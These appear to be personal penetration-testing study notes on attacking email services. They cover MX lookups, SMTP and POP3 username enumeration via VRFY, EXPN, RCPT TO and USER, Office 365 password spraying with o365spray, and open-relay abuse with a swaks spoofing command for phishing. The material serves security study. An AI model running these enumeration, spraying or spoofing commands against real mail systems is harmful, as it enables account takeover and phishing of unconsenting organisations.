notes

25,143,110,465,587,993,995 - Email

4 min read

When we press the Send button in our email application, the program establishes a connection to an SMTP server on the network or Internet.

When we download emails to our email application, it will connect to a POP3 or IMAP4 server on the Internet, which allows the user to save messages in a server mailbox and download them periodically.

Enumeration

Email servers are complex and usually require us to enumerate multiple servers, ports, and services.

And most companies today, uses email services in the cloud such as Microsoft 365 or G-Suite. Therefore, our approach to attacking the email service depends on the service in use.

We can use the Mail eXchanger (MX) DNS record to identify a mail server.

We can use tools such as host or dig and online websites such as MXToolbox to query information about the MX records.

Host - MX Records

host -t MX cia.gov                                     
cia.gov mail is handled by 10 mail4.cia.gov.
cia.gov mail is handled by 10 mail3.cia.gov.

DIG - MX Records

dig mx fbi.gov | grep "MX" | grep -v ";"   

fbi.gov.                120     IN      MX      20 mx-west.fbi.gov.
fbi.gov.                120     IN      MX      10 mx-east.fbi.gov.

Host - A Records

host -t A mx-west.fbi.gov.
mx-west.fbi.gov has address 153.31.192.142
PortService
TCP/25SMTP Unencrypted
TCP/143IMAP4 Unencrypted
TCP/110POP3 Unencrypted
TCP/465SMTP Encrypted
TCP/587SMTP Encrypted/STARTTLS
TCP/993IMAP4 Encrypted
TCP/995POP3 Encrypted

Misconfigurations

A misconfiguration can happen when the SMTP service allows anonymous authentication or support protocols that can be used to enumerate valid usernames.

Authentication

The SMTP server has different commands that can be used to enumerate valid usernames VRFY, EXPN, and RCPT TO. If we successfully enumerate valid usernames, we can attempt to password spray, brute-forcing, or guess a valid password. So let’s explore how those commands work.

VRFY Command

VRFY this command instructs the receiving SMTP server to check the validity of a particular email username.

telnet <IP> 25

VRFY root

252 2.0.0 root


VRFY www-data

252 2.0.0 www-data


VRFY new-user

550 5.1.1 <new-user>: Recipient address rejected: User unknown in local recipient table
EXPN Command

EXPN is similar to VRFY, except that when used with a distribution list, it will list all users on that list.

telnet <ip> 25


EXPN john

250 2.1.0 john@<domain>


EXPN support-team

250 2.0.0 carol@<domain>
250 2.1.5 elisa@<domain>
RCPT TO Command

RCPT TO identifies the recipient of the email message. This command can be repeated multiple times for a given message to deliver a single message to multiple recipients.

telnet <ip> 25

MAIL FROM:test@htb.com
it is
250 2.1.0 test@htb.com... Sender ok


RCPT TO:julio

550 5.1.1 julio... User unknown


RCPT TO:kate

550 5.1.1 kate... User unknown


RCPT TO:john

250 2.1.5 john... Recipient ok

We can also use the POP3 protocol to enumerate users depending on the service implementation.

USER Command

We can use the command USER followed by the username, and if the server responds OK. This means that the user exists on the server.

telnet <IP> 110

USER julio

-ERR


USER john

+OK

To automate our enumeration process, we can use a tool named smtp-user-enum.

smtp-user-enum -M RCPT -U <userlist> -D <domain> -t <target>

Cloud Enumeration

O365 Spray

O365spray is a username enumeration and password spraying tool aimed at Microsoft Office 365 (O365).

Checking Username
python3 o365spray.py --validate --domain <domain>

python3 o365spray.py --enum -U <userlist> --domain <domain>
Password Spraying
python3 o365spray.py --spray -U <valid userlist> -p 'password123' --count 1 --lockout 1 --domain <domain>

Password Spraying Using Hydra

Click here to view the command.

Protocol Specifics Attacks

Open Relay

An open relay is a SMTP serverm which is improperly configured and allows an unauthenticated email relay.

From an attacker’s standpoint, we can abuse this for phishing by sending emails as non-existing users or spoofing someone else’s email. With the nmap smtp-open-relay script, we can identify if an SMTP port allows an open relay.

nmap -p25 -Pn --script smtp-open-relay <ip>


25/tcp open  smtp
|_smtp-open-relay: Server is an open relay (14/16 tests)

Next, we can use any mail client to connect to the mail server and send our email.

swaks --from notifications@<domain> --to employees@<domain> --header 'Subject: Company Notification' --body 'Message' --server <ip>

Graph View